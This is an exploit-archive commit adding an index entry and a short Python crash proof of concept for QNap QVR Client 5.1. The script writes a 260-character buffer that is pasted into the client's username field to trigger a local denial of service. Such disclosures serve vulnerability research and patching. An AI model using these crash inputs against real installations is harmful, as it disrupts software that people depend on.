DB: 2015-11-08
1 new exploits
This commit is contained in:
parent
58b97ca2f6
commit
979bf80ebc
2 changed files with 26 additions and 0 deletions
|
@ -34920,3 +34920,4 @@ id,file,description,date,author,platform,type,port
|
|||
38641,platforms/multiple/webapps/38641.rb,"JSSE SKIP-TLS Exploit",2015-11-05,"Ramon de C Valle",multiple,webapps,0
|
||||
38643,platforms/php/webapps/38643.txt,"WordPress Pie Register Plugin 'wp-login.php' Multiple Cross Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0
|
||||
38646,platforms/jsp/webapps/38646.txt,"NXFilter 3.0.3 - Multiple XSS Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0
|
||||
38650,platforms/windows/dos/38650.py,"QNap QVR Client 5.1.0.11290 - Crash PoC",2015-11-07,"Luis Martínez",windows,dos,0
|
||||
|
|
Can't render this file because it is too large.
|
25
platforms/windows/dos/38650.py
Executable file
25
platforms/windows/dos/38650.py
Executable file
|
@ -0,0 +1,25 @@
|
|||
#!/usr/bin/env python
|
||||
# -*- coding: utf-8 -*-
|
||||
# Exploit Title : QNap QVR Client 5.1.0.11290 Crash PoC
|
||||
# Discovery by : Luis Martínez
|
||||
# Email : l4m5@hotmail.com
|
||||
# Discovery Date : 05/11/2015
|
||||
# Vendor Homepage: http://www.qnapsecurity.com/n/en/
|
||||
# Software Link : http://download.qnap.com/Surveillance/Utility/QMon_20150630.zip
|
||||
# Tested Version : 5.1
|
||||
# Vulnerability Type : Denial of Service (DoS) Local
|
||||
# Tested on OS : Windows 10 Pro x64 es
|
||||
# Steps to Produce the Crash:
|
||||
# 1.- Run python code : python qvr_client_5.1.py
|
||||
# 2.- Open qvr_client_5.1.txt and copy content to clipboard
|
||||
# 3.- Open QVR Client
|
||||
# 4.- Direccion IP/Puerto -> 10.10.10.1 / 80
|
||||
# 5.- Paste ClipBoard on "Nombre de Usuario"
|
||||
# 6.- Contraseña -> test
|
||||
# 7.- Aceptar
|
||||
# 8.- Crashed
|
||||
|
||||
buffer = "\x41" * 260
|
||||
f = open ("qvr_client_5.1.txt", "w")
|
||||
f.write(buffer)
|
||||
f.close()
|
Loading…
Add table
Reference in a new issue